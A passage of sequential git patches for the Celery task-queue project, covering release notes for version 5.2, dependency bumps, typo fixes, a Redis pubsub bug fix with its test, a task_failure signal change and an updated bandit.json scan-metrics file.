+
+Prefork Workers Pool
+---------------------
+
+Now all orphaned worker processes are killed automatically when main process exits.
+
+Eventlet Workers Pool
+---------------------
+
+You can now terminate running revoked tasks while using the
+Eventlet Workers Pool.
+
+Custom Task Classes
+-------------------
+
+We introduced a custom handler which will be executed before the task
+is started called ``before_start``.
+
+See :ref:`custom-task-cls-app-wide` for more details.
+
+Important Notes From 5.0
+------------------------
+
+Dropped support for Python 2.7 & 3.5
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Celery now requires Python 3.6 and above.
+
+Python 2.7 has reached EOL in January 2020.
+In order to focus our efforts we have dropped support for Python 2.7 in
+this version.
+
+In addition, Python 3.5 has reached EOL in September 2020.
+Therefore, we are also dropping support for Python 3.5.
+
+If you still require to run Celery using Python 2.7 or Python 3.5
+you can still use Celery 4.x.
+However we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 2.7 or
+Python 3.5.
+
+Eventlet Workers Pool
+~~~~~~~~~~~~~~~~~~~~~
+
+Due to `eventlet/eventlet#526 <https://github.com/eventlet/eventlet/issues/526>`_
+the minimum required version is eventlet 0.26.1.
+
+Gevent Workers Pool
+~~~~~~~~~~~~~~~~~~~
+
+Starting from v5.0, the minimum required version is gevent 1.0.0.
+
+Couchbase Result Backend
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Couchbase result backend now uses the V3 Couchbase SDK.
+
+As a result, we no longer support Couchbase Server 5.x.
+
+Also, starting from v5.0, the minimum required version
+for the database client is couchbase 3.0.0.
+
+To verify that your Couchbase Server is compatible with the V3 SDK,
+please refer to their `documentation `_.
+
+Riak Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The Riak result backend has been removed as the database is no longer maintained.
+
+The Python client only supports Python 3.6 and below which prevents us from
+supporting it and it is also unmaintained.
+
+If you are still using Riak, refrain from upgrading to Celery 5.0 while you
+migrate your application to a different database.
+
+We apologize for the lack of notice in advance but we feel that the chance
+you'll be affected by this breaking change is minimal which is why we
+did it.
+
+AMQP Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The AMQP result backend has been removed as it was deprecated in version 4.0.
+
+Removed Deprecated Modules
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The `celery.utils.encoding` and the `celery.task` modules have been deprecated
+in version 4.0 and therefore are removed in 5.0.
+
+If you were using the `celery.utils.encoding` module before,
+you should import `kombu.utils.encoding` instead.
+
+If you were using the `celery.task` module before, you should import directly
+from the `celery` module instead.
+
+`azure-servicebus` 7.0.0 is now required
+----------------------------------------
+
+Given the SDK changes between 0.50.0 and 7.0.0 Kombu deprecates support for
+older `azure-servicebus` versions.
+
+.. _v520-news:
+
+News
+====
+
+Support for invoking chords of unregistered tasks
+-------------------------------------------------
+
+Previously if you attempted to publish a chord
+while providing a signature which wasn't registered in the Celery app publishing
+the chord as the body of the chord, an :exc:`celery.exceptions.NotRegistered`
+exception would be raised.
+
+From now on, you can publish these sort of chords and they would be executed
+correctly:
+
+.. code-block:: python
+
+ # movies.task.publish_movie is registered in the current app
+ movie_task = celery_app.signature('movies.task.publish_movie', task_id=str(uuid.uuid4()), immutable=True)
+ # news.task.publish_news is *not* registered in the current app
+ news_task = celery_app.signature('news.task.publish_news', task_id=str(uuid.uuid4()), immutable=True)
+
+ my_chord = chain(movie_task,
+ group(movie_task.set(task_id=str(uuid.uuid4())),
+ movie_task.set(task_id=str(uuid.uuid4()))),
+ news_task)
+ my_chord.apply_async() # <-- No longer raises an exception
+
+Consul Result Backend
+---------------------
+
+We now create a new client per request to Consul to avoid a bug in the Consul
+client.
+
+The Consul Result Backend now accepts a new
+:setting:`result_backend_transport_options` key: ``one_client``.
+You can opt out of this behavior by setting ``one_client`` to True.
+
+Please refer to the documentation of the backend if you're using the Consul
+backend to find out which behavior suits you.
+
+Filesystem Result Backend
+-------------------------
+
+We now cleanup expired task results while using the
+filesystem result backend as most result backends do.
+
+ArangoDB Result Backend
+-----------------------
+
+You can now check the validity of the CA certificate while making
+a TLS connection to ArangoDB result backend.
+
+If you'd like to do so, set the ``verify`` key in the
+:setting:`arangodb_backend_settings` dictionary to ``True``.
From 87a7ef762736a6f9680aa34d500a577920696cb0 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 2 Nov 2021 18:40:59 +0200
Subject: [PATCH 104/177] Bump kombu to version 5.2.0
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index 6d28411082d..ba82765ab85 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,6 +1,6 @@
pytz>dev
billiard>=3.6.4.0,<4.0
-kombu>=5.2.0rc1,<6.0
+kombu>=5.2.0,<6.0
vine>=5.0.0,<6.0
click>=8.0,<9.0
click-didyoumean>=0.0.3
From 5d68d781de807b4576cf5f574e5ba0aaf0d17388 Mon Sep 17 00:00:00 2001
From: "Kian-Meng, Ang"
Date: Sat, 30 Oct 2021 07:12:22 +0800
Subject: [PATCH 105/177] Fix typos
---
celery/app/autoretry.py | 2 +-
celery/concurrency/asynpool.py | 4 ++--
celery/contrib/pytest.py | 2 +-
celery/loaders/base.py | 2 +-
celery/utils/functional.py | 2 +-
celery/utils/text.py | 4 ++--
celery/utils/threads.py | 2 +-
docker/Dockerfile | 2 +-
docs/history/changelog-4.4.rst | 2 +-
docs/history/whatsnew-3.0.rst | 2 +-
docs/history/whatsnew-4.4.rst | 2 +-
extra/generic-init.d/celerybeat | 2 +-
t/unit/backends/test_redis.py | 2 +-
t/unit/tasks/test_canvas.py | 2 +-
t/unit/utils/test_collections.py | 2 +-
t/unit/worker/test_worker.py | 2 +-
16 files changed, 18 insertions(+), 18 deletions(-)
diff --git a/celery/app/autoretry.py b/celery/app/autoretry.py
index a22b9f04717..a5fe700b650 100644
--- a/celery/app/autoretry.py
+++ b/celery/app/autoretry.py
@@ -33,7 +33,7 @@ def run(*args, **kwargs):
try:
return task._orig_run(*args, **kwargs)
except Ignore:
- # If Ignore signal occures task shouldn't be retried,
+ # If Ignore signal occurs task shouldn't be retried,
# even if it suits autoretry_for list
raise
except Retry:
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index 0c16187823b..d5d2bdb5124 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -1068,7 +1068,7 @@ def get_process_queues(self):
if owner is None)
def on_grow(self, n):
- """Grow the pool by ``n`` proceses."""
+ """Grow the pool by ``n`` processes."""
diff = max(self._processes - len(self._queues), 0)
if diff:
self._queues.update({
@@ -1248,7 +1248,7 @@ def on_partial_read(self, job, proc):
"""Called when a job was partially written to exited child."""
# worker terminated by signal:
# we cannot reuse the sockets again, because we don't know if
- # the process wrote/read anything frmo them, and if so we cannot
+ # the process wrote/read anything from them, and if so we cannot
# restore the message boundaries.
if not job._accepted:
# job was not acked, so find another worker to send it to.
diff --git a/celery/contrib/pytest.py b/celery/contrib/pytest.py
index f44a828ecaa..858e4e5c447 100644
--- a/celery/contrib/pytest.py
+++ b/celery/contrib/pytest.py
@@ -22,7 +22,7 @@
def pytest_configure(config):
"""Register additional pytest configuration."""
# add the pytest.mark.celery() marker registration to the pytest.ini [markers] section
- # this prevents pytest 4.5 and newer from issueing a warning about an unknown marker
+ # this prevents pytest 4.5 and newer from issuing a warning about an unknown marker
# and shows helpful marker documentation when running pytest --markers.
config.addinivalue_line(
"markers", "celery(**overrides): override celery configuration for a test case"
diff --git a/celery/loaders/base.py b/celery/loaders/base.py
index 8cc15de8f8a..17f165d7c03 100644
--- a/celery/loaders/base.py
+++ b/celery/loaders/base.py
@@ -251,7 +251,7 @@ def autodiscover_tasks(packages, related_name='tasks'):
def find_related_module(package, related_name):
"""Find module in package."""
- # Django 1.7 allows for speciying a class name in INSTALLED_APPS.
+ # Django 1.7 allows for specifying a class name in INSTALLED_APPS.
# (Issue #2248).
try:
module = importlib.import_module(package)
diff --git a/celery/utils/functional.py b/celery/utils/functional.py
index 2878bc15ea0..e8a8453cc6e 100644
--- a/celery/utils/functional.py
+++ b/celery/utils/functional.py
@@ -1,4 +1,4 @@
-"""Functional-style utilties."""
+"""Functional-style utilities."""
import inspect
import sys
from collections import UserList
diff --git a/celery/utils/text.py b/celery/utils/text.py
index 661a02fc002..8f4a321eebb 100644
--- a/celery/utils/text.py
+++ b/celery/utils/text.py
@@ -33,13 +33,13 @@ def str_to_list(s):
def dedent_initial(s, n=4):
# type: (str, int) -> str
- """Remove identation from first line of text."""
+ """Remove indentation from first line of text."""
return s[n:] if s[:n] == ' ' * n else s
def dedent(s, n=4, sep='\n'):
# type: (str, int, str) -> str
- """Remove identation."""
+ """Remove indentation."""
return sep.join(dedent_initial(l) for l in s.splitlines())
diff --git a/celery/utils/threads.py b/celery/utils/threads.py
index a80b9ed69cf..94c6f617c40 100644
--- a/celery/utils/threads.py
+++ b/celery/utils/threads.py
@@ -282,7 +282,7 @@ def __init__(self, locals=None, ident_func=None):
def get_ident(self):
"""Return context identifier.
- This is the indentifer the local objects use internally
+ This is the identifier the local objects use internally
for this context. You cannot override this method to change the
behavior but use it to link other context local objects (such as
SQLAlchemy's scoped sessions) to the Werkzeug locals.
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 7f91b01cc59..0cd557070d0 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -47,7 +47,7 @@ ENV PATH="$HOME/.pyenv/bin:$PATH"
# Copy and run setup scripts
WORKDIR $PROVISIONING
#COPY docker/scripts/install-couchbase.sh .
-# Scripts will lose thier executable flags on copy. To avoid the extra instructions
+# Scripts will lose their executable flags on copy. To avoid the extra instructions
# we call the shell directly.
#RUN sh install-couchbase.sh
COPY docker/scripts/create-linux-user.sh .
diff --git a/docs/history/changelog-4.4.rst b/docs/history/changelog-4.4.rst
index 506672c4f0a..e6a851676cd 100644
--- a/docs/history/changelog-4.4.rst
+++ b/docs/history/changelog-4.4.rst
@@ -25,7 +25,7 @@ an overview of what's new in Celery 4.4.
- Fix REMAP_SIGTERM=SIGQUIT not working
- (Fixes#6258) MongoDB: fix for serialization issue (#6259)
- Make use of ordered sets in Redis opt-in
-- Test, CI, Docker & style and minor doc impovements.
+- Test, CI, Docker & style and minor doc improvements.
4.4.6
=======
diff --git a/docs/history/whatsnew-3.0.rst b/docs/history/whatsnew-3.0.rst
index 3b06ab91d14..7abd3229bac 100644
--- a/docs/history/whatsnew-3.0.rst
+++ b/docs/history/whatsnew-3.0.rst
@@ -524,7 +524,7 @@ stable and is now documented as part of the official API.
.. code-block:: pycon
>>> celery.control.pool_grow(2, destination=['w1.example.com'])
- >>> celery.contorl.pool_shrink(2, destination=['w1.example.com'])
+ >>> celery.control.pool_shrink(2, destination=['w1.example.com'])
or using the :program:`celery control` command:
diff --git a/docs/history/whatsnew-4.4.rst b/docs/history/whatsnew-4.4.rst
index 1f252de30a5..24b4ac61b3b 100644
--- a/docs/history/whatsnew-4.4.rst
+++ b/docs/history/whatsnew-4.4.rst
@@ -51,7 +51,7 @@ This release has been codenamed `Cliffs
Date: Sun, 31 Oct 2021 17:57:04 +0600
Subject: [PATCH 106/177] python 3 shell for testing CI
---
setup.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/setup.py b/setup.py
index fa3369b92be..6b41a8a71a6 100755
--- a/setup.py
+++ b/setup.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
import codecs
import os
import re
From 013b0e988f9141f5135baa8c7c6d30aa575779da Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Thu, 4 Nov 2021 12:22:55 +0200
Subject: [PATCH 107/177] Limit pymongo version: <3.12.1 (#7041)
---
requirements/extras/mongodb.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/mongodb.txt b/requirements/extras/mongodb.txt
index b3e1256564f..7ad511e68c5 100644
--- a/requirements/extras/mongodb.txt
+++ b/requirements/extras/mongodb.txt
@@ -1 +1 @@
-pymongo[srv]>=3.3.0
+pymongo[srv]>=3.3.0,<3.12.1
From e5d99801e4b56a02af4a2e183879c767228d2817 Mon Sep 17 00:00:00 2001
From: Wei Wei <49308161+Androidown@users.noreply.github.com>
Date: Thu, 4 Nov 2021 22:54:04 +0800
Subject: [PATCH 108/177] Prevent from subscribing to empty channels (#7040)
* Prevent from subscribing to empty channels
* add unit test for pr.
Co-authored-by: weiwei
---
celery/backends/redis.py | 3 ++-
t/unit/backends/test_redis.py | 9 +++++++++
2 files changed, 11 insertions(+), 1 deletion(-)
diff --git a/celery/backends/redis.py b/celery/backends/redis.py
index e4a4cc104e7..7eedc4c089b 100644
--- a/celery/backends/redis.py
+++ b/celery/backends/redis.py
@@ -110,7 +110,8 @@ def _reconnect_pubsub(self):
self._pubsub = self.backend.client.pubsub(
ignore_subscribe_messages=True,
)
- self._pubsub.subscribe(*self.subscribed_to)
+ if self.subscribed_to:
+ self._pubsub.subscribe(*self.subscribed_to)
@contextmanager
def reconnect_on_error(self):
diff --git a/t/unit/backends/test_redis.py b/t/unit/backends/test_redis.py
index f93fcd160d4..13dcf2eee9a 100644
--- a/t/unit/backends/test_redis.py
+++ b/t/unit/backends/test_redis.py
@@ -276,6 +276,15 @@ def test_drain_events_connection_error(self, parent_on_state_change, cancel_for)
parent_on_state_change.assert_called_with(meta, None)
assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial'}
+ def test_drain_events_connection_error_no_patch(self):
+ meta = {'task_id': 'initial', 'status': states.SUCCESS}
+ consumer = self.get_consumer()
+ consumer.start('initial')
+ consumer.backend._set_with_state(b'celery-task-meta-initial', json.dumps(meta), states.SUCCESS)
+ consumer._pubsub.get_message.side_effect = ConnectionError()
+ consumer.drain_events()
+ consumer._pubsub.subscribe.assert_not_called()
+
class basetest_RedisBackend:
def get_backend(self):
From 3bbf8c8918ee892432bbae5973de5b7e10515eaf Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 5 Nov 2021 14:24:04 +0600
Subject: [PATCH 109/177] try new latest version 12.9.0 (#7042)
---
requirements/extras/azureblockblob.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/azureblockblob.txt b/requirements/extras/azureblockblob.txt
index e533edb7e76..a9208b97325 100644
--- a/requirements/extras/azureblockblob.txt
+++ b/requirements/extras/azureblockblob.txt
@@ -1 +1 @@
-azure-storage-blob==12.6.0
+azure-storage-blob==12.9.0
From c66e8c4a30fe8ace600d378b65c0f3577ee645ff Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Sat, 6 Nov 2021 19:54:21 +0600
Subject: [PATCH 110/177] update to new django settings (#7044)
---
examples/celery_http_gateway/settings.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/examples/celery_http_gateway/settings.py b/examples/celery_http_gateway/settings.py
index a671b980e49..d8001673c90 100644
--- a/examples/celery_http_gateway/settings.py
+++ b/examples/celery_http_gateway/settings.py
@@ -75,11 +75,11 @@
'django.template.loaders.app_directories.load_template_source',
)
-MIDDLEWARE_CLASSES = (
+MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
-)
+]
ROOT_URLCONF = 'celery_http_gateway.urls'
From 37481fdd57a1ec036695a86d8f3d5e36f9ecf84c Mon Sep 17 00:00:00 2001
From: ninlei
Date: Fri, 5 Nov 2021 20:30:21 +0800
Subject: [PATCH 111/177] fix register_task method
Fix: parameters could not be passed through to add_autoretry_behaviour when calling the register_task method.
---
celery/app/base.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/celery/app/base.py b/celery/app/base.py
index a00d4651336..0b893fddb87 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -492,7 +492,7 @@ def _task_from_fun(self, fun, name=None, base=None, bind=False, **options):
task = self._tasks[name]
return task
- def register_task(self, task):
+ def register_task(self, task, **options):
"""Utility for registering a task-based class.
Note:
@@ -505,7 +505,7 @@ def register_task(self, task):
task_cls = type(task)
task.name = self.gen_task_name(
task_cls.__name__, task_cls.__module__)
- add_autoretry_behaviour(task)
+ add_autoretry_behaviour(task, **options)
self.tasks[task.name] = task
task._app = self
task.bind(self)
From ef77fcd2ac872275cdd0f85e21180fe7b6433125 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Sun, 7 Nov 2021 16:24:13 +0200
Subject: [PATCH 112/177] Add pymongo issue to "What's new in Celery 5.2"
(#7051)
* Add pymongo issue to "What's new in Celery 5.2"
* Update whatsnew-5.2.rst
* Update whatsnew-5.2.rst
---
docs/whatsnew-5.2.rst | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/docs/whatsnew-5.2.rst b/docs/whatsnew-5.2.rst
index f1f60743cf8..1180a653c63 100644
--- a/docs/whatsnew-5.2.rst
+++ b/docs/whatsnew-5.2.rst
@@ -330,6 +330,13 @@ older `azure-servicebus` versions.
.. _v520-news:
+Bug: Pymongo 3.12.1 is not compatible with Celery 5.2
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For now we are limiting Pymongo version, only allowing for versions between 3.3.0 and 3.12.0.
+
+This will be fixed in the next patch.
+
News
====
From 54862310a929fa1543b4ae4e89694905015a1216 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Mon, 8 Nov 2021 02:36:34 +0200
Subject: [PATCH 113/177] Fire task failure signal on final reject (#6980)
* Improve Request.on_failure() unit tests.
* Fire the task_failure signal when task is not going to be requeued.
---
celery/worker/request.py | 6 ++++
t/unit/worker/test_request.py | 53 ++++++++++++++++++++++++++++++-----
2 files changed, 52 insertions(+), 7 deletions(-)
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 0b29bde65bb..fb6d60e6812 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -579,6 +579,12 @@ def on_failure(self, exc_info, send_failed_event=True, return_ok=False):
store_result=self.store_errors,
)
+ signals.task_failure.send(sender=self.task, task_id=self.id,
+ exception=exc, args=self.args,
+ kwargs=self.kwargs,
+ traceback=exc_info.traceback,
+ einfo=exc_info)
+
if send_failed_event:
self.send_event(
'task-failed',
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index eb173a1c987..2c49f777103 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -19,7 +19,7 @@
from celery.backends.base import BaseDictBackend
from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry,
TaskRevokedError, Terminated, WorkerLostError)
-from celery.signals import task_retry, task_revoked
+from celery.signals import task_failure, task_retry, task_revoked
from celery.worker import request as module
from celery.worker import strategy
from celery.worker.request import Request, create_request_cls
@@ -171,7 +171,6 @@ def ignores_result(i):
assert not self.app.AsyncResult(task_id).ready()
def test_execute_request_ignore_result(self):
-
@self.app.task(shared=False)
def ignores_result(i):
return i ** i
@@ -232,7 +231,8 @@ def test_info_function(self):
kwargs[str(i)] = ''.join(
random.choice(string.ascii_lowercase) for i in range(1000))
assert self.get_request(
- self.add.s(**kwargs)).info(safe=True).get('kwargs') == '' # mock message doesn't populate kwargsrepr
+ self.add.s(**kwargs)).info(safe=True).get(
+ 'kwargs') == '' # mock message doesn't populate kwargsrepr
assert self.get_request(
self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs
args = []
@@ -240,7 +240,8 @@ def test_info_function(self):
args.append(''.join(
random.choice(string.ascii_lowercase) for i in range(1000)))
assert list(self.get_request(
- self.add.s(*args)).info(safe=True).get('args')) == [] # mock message doesn't populate argsrepr
+ self.add.s(*args)).info(safe=True).get(
+ 'args')) == [] # mock message doesn't populate argsrepr
assert list(self.get_request(
self.add.s(*args)).info(safe=False).get('args')) == args
@@ -336,32 +337,69 @@ def test_on_failure_Reject_rejects_with_requeue(self):
)
def test_on_failure_WorkerLostError_rejects_with_requeue(self):
- einfo = None
try:
raise WorkerLostError()
except WorkerLostError:
einfo = ExceptionInfo(internal=True)
+
req = self.get_request(self.add.s(2, 2))
req.task.acks_late = True
req.task.reject_on_worker_lost = True
req.delivery_info['redelivered'] = False
+ req.task.backend = Mock()
+
req.on_failure(einfo)
+
req.on_reject.assert_called_with(
req_logger, req.connection_errors, True)
+ req.task.backend.mark_as_failure.assert_not_called()
def test_on_failure_WorkerLostError_redelivered_None(self):
- einfo = None
try:
raise WorkerLostError()
except WorkerLostError:
einfo = ExceptionInfo(internal=True)
+
req = self.get_request(self.add.s(2, 2))
req.task.acks_late = True
req.task.reject_on_worker_lost = True
req.delivery_info['redelivered'] = None
+ req.task.backend = Mock()
+
req.on_failure(einfo)
+
req.on_reject.assert_called_with(
req_logger, req.connection_errors, True)
+ req.task.backend.mark_as_failure.assert_not_called()
+
+ def test_on_failure_WorkerLostError_redelivered_True(self):
+ try:
+ raise WorkerLostError()
+ except WorkerLostError:
+ einfo = ExceptionInfo(internal=True)
+
+ req = self.get_request(self.add.s(2, 2))
+ req.task.acks_late = False
+ req.task.reject_on_worker_lost = True
+ req.delivery_info['redelivered'] = True
+ req.task.backend = Mock()
+
+ with self.assert_signal_called(
+ task_failure,
+ sender=req.task,
+ task_id=req.id,
+ exception=einfo.exception,
+ args=req.args,
+ kwargs=req.kwargs,
+ traceback=einfo.traceback,
+ einfo=einfo
+ ):
+ req.on_failure(einfo)
+
+ req.task.backend.mark_as_failure.assert_called_once_with(req.id,
+ einfo.exception,
+ request=req._context,
+ store_result=True)
def test_tzlocal_is_cached(self):
req = self.get_request(self.add.s(2, 2))
@@ -1292,7 +1330,8 @@ def test_execute_using_pool_with_none_timelimit_header(self):
def test_execute_using_pool__defaults_of_hybrid_to_proto2(self):
weakref_ref = Mock(name='weakref.ref')
headers = strategy.hybrid_to_proto2(Mock(headers=None), {'id': uuid(),
- 'task': self.mytask.name})[1]
+ 'task': self.mytask.name})[
+ 1]
job = self.zRequest(revoked_tasks=set(), ref=weakref_ref, **headers)
job.execute_using_pool(self.pool)
assert job._apply_result
From 8de7f1430299dd3dbb6a7ea2afef45585a679c09 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 06:37:50 +0600
Subject: [PATCH 114/177] update kombu to 5.2.1 (#7053)
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index ba82765ab85..c9110a53ef6 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,6 +1,6 @@
pytz>dev
billiard>=3.6.4.0,<4.0
-kombu>=5.2.0,<6.0
+kombu>=5.2.1,<6.0
vine>=5.0.0,<6.0
click>=8.0,<9.0
click-didyoumean>=0.0.3
From 6138d6060f17eef27ce0c90d3bf18f305ace97c6 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 06:45:29 +0600
Subject: [PATCH 115/177] update kombu
---
setup.cfg | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/setup.cfg b/setup.cfg
index 53909275c13..daa92865f7f 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -31,7 +31,7 @@ per-file-ignores =
[bdist_rpm]
requires = pytz >= 2016.7
billiard >= 3.6.3.0,<4.0
- kombu >= 5.2.0rc1,<6.0.0
+ kombu >= 5.2.1,<6.0.0
[bdist_wheel]
universal = 0
From fb95cf0d0aa2412f0130a303ab2c58091334cebc Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 07:02:06 +0600
Subject: [PATCH 116/177] update bandit
---
bandit.json | 466 ++++++++++++++++++++++++----------------------------
1 file changed, 213 insertions(+), 253 deletions(-)
diff --git a/bandit.json b/bandit.json
index 95a9201f312..fa207a9c734 100644
--- a/bandit.json
+++ b/bandit.json
@@ -1,17 +1,17 @@
{
"errors": [],
- "generated_at": "2020-08-06T14:09:58Z",
+ "generated_at": "2021-11-08T00:55:15Z",
"metrics": {
"_totals": {
- "CONFIDENCE.HIGH": 38.0,
+ "CONFIDENCE.HIGH": 40.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 2.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 38.0,
+ "SEVERITY.LOW": 40.0,
"SEVERITY.MEDIUM": 2.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 29309,
+ "loc": 29546,
"nosec": 0
},
"celery/__init__.py": {
@@ -23,7 +23,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 129,
+ "loc": 126,
"nosec": 0
},
"celery/__main__.py": {
@@ -35,7 +35,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 9,
+ "loc": 12,
"nosec": 0
},
"celery/_state.py": {
@@ -71,7 +71,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 528,
+ "loc": 503,
"nosec": 0
},
"celery/app/annotations.py": {
@@ -95,7 +95,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 43,
+ "loc": 50,
"nosec": 0
},
"celery/app/backends.py": {
@@ -119,7 +119,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 964,
+ "loc": 1028,
"nosec": 0
},
"celery/app/builtins.py": {
@@ -143,7 +143,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 383,
+ "loc": 607,
"nosec": 0
},
"celery/app/defaults.py": {
@@ -155,7 +155,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 365,
+ "loc": 361,
"nosec": 0
},
"celery/app/events.py": {
@@ -179,7 +179,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 197,
+ "loc": 198,
"nosec": 0
},
"celery/app/registry.py": {
@@ -203,7 +203,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 110,
+ "loc": 107,
"nosec": 0
},
"celery/app/task.py": {
@@ -215,7 +215,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 740,
+ "loc": 779,
"nosec": 0
},
"celery/app/trace.py": {
@@ -227,7 +227,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 535,
+ "loc": 560,
"nosec": 0
},
"celery/app/utils.py": {
@@ -239,7 +239,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 300,
+ "loc": 315,
"nosec": 0
},
"celery/apps/__init__.py": {
@@ -275,7 +275,7 @@
"SEVERITY.LOW": 2.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 409,
+ "loc": 426,
"nosec": 0
},
"celery/apps/worker.py": {
@@ -287,7 +287,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 291,
+ "loc": 304,
"nosec": 0
},
"celery/backends/__init__.py": {
@@ -299,19 +299,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 17,
- "nosec": 0
- },
- "celery/backends/amqp.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 265,
+ "loc": 1,
"nosec": 0
},
"celery/backends/arangodb.py": {
@@ -323,7 +311,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 199,
+ "loc": 201,
"nosec": 0
},
"celery/backends/asynchronous.py": {
@@ -347,7 +335,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 107,
+ "loc": 126,
"nosec": 0
},
"celery/backends/base.py": {
@@ -359,7 +347,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 773,
+ "loc": 809,
"nosec": 0
},
"celery/backends/cache.py": {
@@ -371,7 +359,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 117,
+ "loc": 118,
"nosec": 0
},
"celery/backends/cassandra.py": {
@@ -383,7 +371,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 178,
